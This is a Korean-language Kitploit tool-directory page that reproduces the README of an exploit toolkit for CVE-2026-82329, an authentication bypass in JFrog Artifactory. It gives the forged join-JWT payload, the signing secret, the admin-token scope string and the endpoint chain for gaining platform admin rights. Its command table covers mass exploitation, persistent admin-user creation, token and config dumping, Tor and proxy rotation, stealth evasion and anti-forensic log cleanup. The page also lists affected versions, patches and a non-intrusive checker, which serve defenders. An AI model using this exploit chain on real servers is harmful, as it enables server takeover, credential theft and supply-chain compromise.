Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-82329-PoC-Exploit — CVE-2026-82329(JFrog Artifactory 인증 우회)에 대한 익스플로잇 및 탐지 툴킷. join JWT를 위조하여 관리자 토큰을 발급하며, 비침투적 버전 검사기를 포함한다. | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Defensive ToolsVulnerability ScannersPayload GenerationExploitationWeb Application ExploitationInformation GatheringSecurity VirtualizationPenetration TestingAuthenticationRed Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit
10시간 35분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-82329-PoC-Exploit

CVE-2026-82329(JFrog Artifactory 인증 우회)에 대한 익스플로잇 및 탐지 툴킷. join JWT를 위조하여 관리자 토큰을 발급하며, 비침투적 버전 검사기를 포함한다.

저장소 보기

CVEPoC

CVE‑2026‑82329 – JFrog Artifactory 인증 우회 툴킷

Python 3.8+ CVSS Author Artifactory

윤리적 사용만 허용 – 승인된 보안 테스트
이 저장소는 승인된 보안 전문가, 블루팀, 침투 테스터만을 위한 도구를 제공합니다.
컴퓨터 시스템에 대한 무단 접근은 CFAA(미국), Computer Misuse Act(영국), TCK 243/244(터키) 및 전 세계의 유사 법률에 따라 불법입니다.


📖 취약점 개요

CVE‑2026‑82329는 자체 호스팅 JFrog Artifactory(버전 7.111.x부터 7.161.x까지)의 치명적인 인증 우회 취약점으로, 인증되지 않은 공격자가 JFrog Access 클러스터 조인 메커니즘을 악용하여 전체 플랫폼 관리자 토큰을 획득할 수 있게 합니다.

작동 방식

  1. 빈 조인 키 신뢰 – JFrog Access는 값이 빈 문자열인 유령 조인 키를 신뢰합니다. 따라서 서명 비밀은 결정론적 값 32 * 0x20(공백)입니다.
  2. 위조된 조인 JWT – 공격자는 이 알려진 비밀로 서명된 HS256 JWT와 kid = SHA256("")를 위조합니다.
  3. SERVICE 토큰 발급 – POST /access/api/v1/registry/join이 인증 없이 scp=admin이 포함된 SERVICE 토큰을 반환합니다.
  4. 관리자 토큰 교환 – scope=applied-permissions/admin&audience=*와 함께 POST /access/api/v1/tokens를 호출하면 전체 플랫폼 관리자 토큰이 발급됩니다.
  5. 영향 – 전체 저장소 탈취, 토큰 도난, 관리자 사용자 생성, 아티팩트 오염, 공급망 공격, 연결된 서비스(Xray, Mission Control, Distribution)로의 측면 이동. 즉시 업그레이드하세요!

영향받는 버전

  • 7.111.4 – 7.111.20 – 취약
  • 7.117.0 – 7.117.27 – 취약
  • 7.125.0 – 7.125.19 – 취약
  • 7.133.0 – 7.133.28 – 취약
  • 7.146.0 – 7.146.36 – 취약
  • 7.161.0 – 7.161.19 – 취약

패치

  • 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38, 또는 7.161.20 이상으로 업그레이드하세요.
  • 업그레이드가 불가능한 경우, Artifactory에 대한 네트워크 접근을 제한하고(인터넷에 절대 노출하지 마세요) 임시 방편으로 모든 관리자 토큰을 교체하세요.

🧰 도구

도구목적대상 사용자
exploit.pyJWT 위조, 관리자 토큰 교환, 관리자 사용자 생성, 대량 스캔, 스텔스 모드, 프록시 로테이션, 대화형 메뉴, 전체 공격 체인을 갖춘 완전한 무기화 툴킷.레드팀 / 승인된 침투 테스터
safechecker.pyArtifactory 버전을 탐지하고, 노출을 검증하며, 토큰을 획득하거나 페이로드를 실행하지 않고 위험을 평가하는 비침투적 취약점 검사기. JSON 보고서를 생성합니다.블루팀 / 보안 감사자

📊 기능 비교


🎯 사용 사례 요약


⚙️ 설치

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 매개변수

exploit.py 매개변수

safechecker.py 매개변수


💥 시나리오


🧪 엔드포인트 및 익스플로잇 체인

익스플로잇은 다음 JFrog 엔드포인트와 익스플로잇 단계를 사용합니다:

페이로드 형식

root@kitploit:~
# 위조된 조인 JWT 구조
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# 서명 비밀
secret = b"\x20" * 32

# 관리자 토큰 요청
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ 책임 있는 사용

  • 이 도구는 소유하거나 테스트에 대한 명시적인 서면 허가를 받은 시스템에서만 사용하세요.
  • 무단 접근은 불법이며 비윤리적입니다.
  • 저자는 어떠한 오용에 대해서도 책임지지 않습니다.
  • 항상 해당 국가의 법률과 규정을 준수하세요.

이 소프트웨어는 교육 목적 및 승인된 보안 테스트 전용으로 제공됩니다.

도구 다운로드
기능exploit.pysafechecker.py
취약점 탐지✅✅
버전 탐지✅✅
위조된 조인 JWT✅❌
서비스 토큰 발급✅❌
관리자 토큰 교환✅❌
관리자 사용자 생성✅❌
저장소 목록 조회✅❌
사용자 목록 조회✅❌
구성 덤프✅❌
토큰 덤프✅❌
전체 공격 체인✅❌
대화형 메뉴✅❌
대량 스캔(멀티스레드)✅✅
프록시 지원✅✅
프록시 로테이션✅❌
Tor 지원(익명성)✅❌
User‑Agent 로테이션(OPSEC)✅❌
지터(OPSEC)✅❌
적응형 속도 제한기✅❌
비침투적(안전) 모드❌✅
버전 보고서✅✅
익명 접근 확인❌✅
JSON 보고서✅✅
로그 정리(안티 포렌식)✅❌
사용자 정의 User‑Agent✅✅
SSL 검증 제어✅✅
시나리오권장 도구
블루팀 – Artifactory가 취약한지 확인safechecker.py
보안 감사 – 비침투적 취약점 평가safechecker.py
레드팀 – 전체 익스플로잇을 포함한 승인된 침투 테스트exploit.py
버그 바운티 – 책임 있는 공개 테스트safechecker.py
대량 스캔 – 여러 대상의 취약점 확인exploit.py (탐지만)
사고 대응 – 시스템이 침해되었는지 확인safechecker.py
매개변수설명
-u, --url단일 대상 Artifactory URL (예: http://artifactory.example.com:8082)
-f, --file대량 스캔을 위한 대상 목록이 포함된 파일(한 줄에 하나씩)
--create-admin지속적인 관리자 사용자 생성(형식: USER:PASS)
--keep-admin생성된 관리자 사용자 유지(스캔 후 정리하지 않음)
--token-only관리자 토큰만 출력(단일 대상)
--interactive익스플로잇 후 대화형 메뉴
--service-id조인 JWT용 서비스 ID(기본값: jfrt@01)
-t, --threads다중 대상용 스레드 수(기본값: 10)
--timeout요청 타임아웃(기본값: 25초)
--retry최대 재시도 횟수(기본값: 3)
--proxyHTTP/HTTPS 프록시(예: http://127.0.0.1:8080)
--proxy-list로테이션용 프록시가 포함된 파일(한 줄에 하나씩)
--jitter요청 간 무작위 지터(0‑2초)
--stealth스텔스 모드 활성화(UA 로테이션 + X‑Forwarded‑For)
--curl-cffiTLS 지문 위장을 위해 curl_cffi 사용
--full전체 공격: 모든 모듈
--dump-config시스템 구성 덤프
--dump-tokens모든 액세스 토큰 덤프
--list-repos저장소 목록 조회
--list-users사용자 목록 조회
--detect탐지만(관리자 토큰 교환 없음)
--exploit전체 익스플로잇 수행
-o, --outputJSON 보고서를 파일로 저장
-v, --verbose상세 출력
-q, --quiet조용한 모드
매개변수설명
-u, --url단일 대상 Artifactory URL (예: http://artifactory.example.com:8082)
-f, --file대상 목록이 포함된 파일(한 줄에 하나씩)
-t, --threads다중 대상용 스레드 수(기본값: 5)
--timeout요청 타임아웃(기본값: 10초)
-v, --verbose상세 출력
-o, --outputJSON 보고서를 파일로 저장
#시나리오명령
1빠른 취약점 확인python safechecker.py -u http://artifactory.example.com:8082
2보고서를 포함한 상세 스캔python safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3파일에서 대량 감사python safechecker.py -f targets.txt -t 10 -o audit.json
4탐지만 하는 익스플로잇python exploit.py -u http://artifactory.example.com:8082 --detect
5관리자 토큰만 획득python exploit.py -u http://artifactory.example.com:8082 --token-only
6대화형 메뉴를 포함한 전체 공격python exploit.py -u http://artifactory.example.com:8082 --interactive
7지속적인 관리자 사용자 생성python exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8구성 덤프python exploit.py -u http://artifactory.example.com:8082 --dump-config
9저장소 및 사용자 목록 조회python exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10스텔스를 포함한 대량 익스플로잇python exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Tor를 사용한 프록시 로테이션python exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth
단계메서드엔드포인트설명
1. 조인POST/access/api/v1/registry/join위조된 HS256 JWT → SERVICE 토큰(scp=admin)
2. 교환POST/access/api/v1/tokensSERVICE 토큰 → 플랫폼 관리자 토큰
3. 증명GET/artifactory/api/system/configuration관리자 전용 접근 증명
4. 지속PUT/artifactory/api/security/users/{user}지속적인 관리자 사용자 생성
5. 폐기DELETE/access/api/v1/tokens/{id}생성된 토큰 정리